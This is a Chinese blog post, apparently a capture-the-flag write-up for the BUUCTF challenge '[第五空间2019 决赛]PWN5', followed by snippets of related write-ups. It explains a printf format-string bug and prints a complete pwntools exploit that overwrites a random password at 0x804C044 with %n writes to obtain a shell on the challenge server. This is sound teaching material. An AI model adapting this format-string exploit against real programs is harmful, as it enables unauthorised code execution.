BUUCTF [第五空间2019 决赛]PWN5

最新推荐文章于 2025-06-20 09:45:53 发布
原创 最新推荐文章于 2025-06-20 09:45:53 发布 · 276 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文介绍了如何在开启了NX和Canary保护的情况下,利用格式化字符串漏洞进行逆向分析。通过ida查看main函数,发现需要使atoi(nptr)等于随机的dword_804C044。利用%10$n等技巧修改函数内容,最终构造payload成功获取权限。然而,为何payload中特定使用0x10101010作为数据的原因未明。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

先checksec,开启了NX保护和Canary保护

也就意味着不能用栈溢出来攻击了

 

运行一下

 

放入ida中

查看main函数

 

我们可以看到只要令atoi(nptr) == dword_804C044就可以拿到权限

但dword_804C044是随机的,所以我们需要将它修改为我们想要的数据

看到了printf(buf);  说明存在格式化字符串漏洞

先计算偏移

我们可以算出偏移为10(从AAAA到41414141)

 

再看这个函数的长度 44~47 共4个字节

所以我们就可以用%10$n%11$n%12$n%13$n来修改该函数的内容

这里的10跟上面计算出的偏移量有关

关于偏移量的计算我是从这里学的

点这里~

写payload

from pwn import*

p = remote('node4.buuoj.cn',28543)
#p = process("./note")
#binsh = "/bin/sh"

addr_dword_804C044 = 0x0804C044
addr_dword_804C045 = 0x0804C045
addr_dword_804C046 = 0x0804C046
addr_dword_804C047 = 0x0804C047
payload =p32(addr_dword_804C044)+p32(addr_dword_804C045)+p32(addr_dword_804C046)+p32(addr_dword_804C047)+'%10$n%11$n%12$n%13$n'
p.sendline(payload)
p.sendline(str(0x10101010))
p.interactive()

至于这里为什么非得是0x10101010而不能用其他数据,我也暂时没搞懂

其他的博主也没有明确的解释,只能暂时放着了

运行payload

 

 

拿到flag!

[buuctf][第五空间2019 决赛]PWN5
逆向萌新的博客
06-19 549
[buuctf][第五空间2019 决赛]PWN5
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
餐桌上的猫
02-15 520
题目截图 检查文件信息 这是一个32位的程序,开启了NX和Canary 用IDA打开查看找到来能getshell的代码 反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置,是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=
BUUCTF Pwn [第五空间2019 决赛]PWN5
MrTreebook的博客
12-25 1070
BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
BUUCTF-[第五空间2019 决赛]PWN5详解
最新发布
2301_76794844的博客
06-20 1157
BUUCTF-[第五空间2019 决赛]PWN5详解
[BUUCTF-pwn]——[第五空间2019 决赛]PWN5
Y_peak的博客
02-21 433
[BUUCTF-pwn]——[第五空间2019 决赛]PWN5 题目地址:https://buuoj.cn/challenges#[第五空间2019%20决赛]PWN5 题目: 这是一道格式化字符串的题,给大家讲解下 checksec一下看看, 开启了canary保护, 基本开启这个保护都会用到格式化字符串的漏洞。 在IDA中 利用pwndbg看看, 偏移是多少。 0xa也就是 10 思路 利用格式化字符串漏洞, 修改unk_804C044的值, 并且输入相等的值 exploit from p
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 1029
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
buuctf之[第五空间2019 决赛]PWN5
weixin_54452942的博客
04-01 859
简单易懂~
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4897
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏
2301_81505831的博客
03-15 660
首先,我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量:可以数出0x41414141是格式化字符串的第10个参数,之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。打开靶机,下载文件,检查文件类型,可以看到是32位程序,开启了Canary保护,不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后,附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。
BUUCTF-pwn(5)
njh18790816639的博客
11-25 481
jarvisoj_level4 简单的ret2libc! from pwn import * from LibcSearcher import * context(log_level='debug',os='linux',arch='i386') r = remote('node4.buuoj.cn',25768) #r = process('./level4') elf = ELF('./level4') main = elf.symbols['main'] write_plt = elf.plt['
BUUCTF-PWN-[第五空间2019 决赛]PWN5
m0_64180167的博客
04-17 530
这题考到 格式化字符串的方法 我之前没有学过 根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护 nx打开 所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计 发现输入名字 他会返回名字 然后再输入密码 如果密码和unk_804c044一样 输出shellcode我们看看这个函数是什么搜索一下发现是随机数 这样我们就无法通过判断得到shellcode我们现在又两个方法。
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 555
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 6305
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
BUUCTF--第五空间决赛pwn5
sandyyyz的博客
10-13 514
给和我一样的pwn新手参考的一次简单的格式化字符串漏洞题解析过程
BUUCTF - [第五空间2019 决赛]PWN5
Sakura给爷pwn全场
02-03 308
from pwn import * context(arch='i386',os='linux',log_level='debug',binary='pwn5') io=remote('node3.buuoj.cn',28518) elf=ELF('./pwn5') io.recvuntil('your name:') unk_addr=0x0804C044 payload=p32(unk_addr)+'%10$n' io.sendline(payload) io.recvuntil('your passw
pwn】[第五空间2019 决赛]PWN5
ethan18的博客
07-13 355
函数的逻辑(就是上面那个伪代码),可以看出,主要是需要让我们的passwd输入值和从文件中输入的值保持相同,但是很明显我们根本就不知道这个。可以数出,0x41414141是格式化字符串的第10个参数,所以我们构造的时候就需要从。这是Buuctf的一道题,是我实战遇到的第一道格式字符串漏洞,在此记录。对于格式化字符串漏洞,我们首先要确定输入点是栈中的第几个参数。函数里面直接输入了地址,表明是有格式字符串漏洞的。,我们一个字节一个字节的存入,所以不能是直接用。,将输出的字符串的数量覆盖进所指向的位置。
[第五空间2019 决赛]PWN5
、moddemod
06-11 1132
exp from pwn import * # sh = remote('node3.buuoj.cn', 29382) context.log_level = 'debug' proc_name = './pwn' sh = process(proc_name) unk_804C044 = 0x804C044 payload = p32(unk_804C044) + p32(unk_804C044 + 1) + p32(unk_804C044 + 2) + p32(unk_804C044 + ...
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值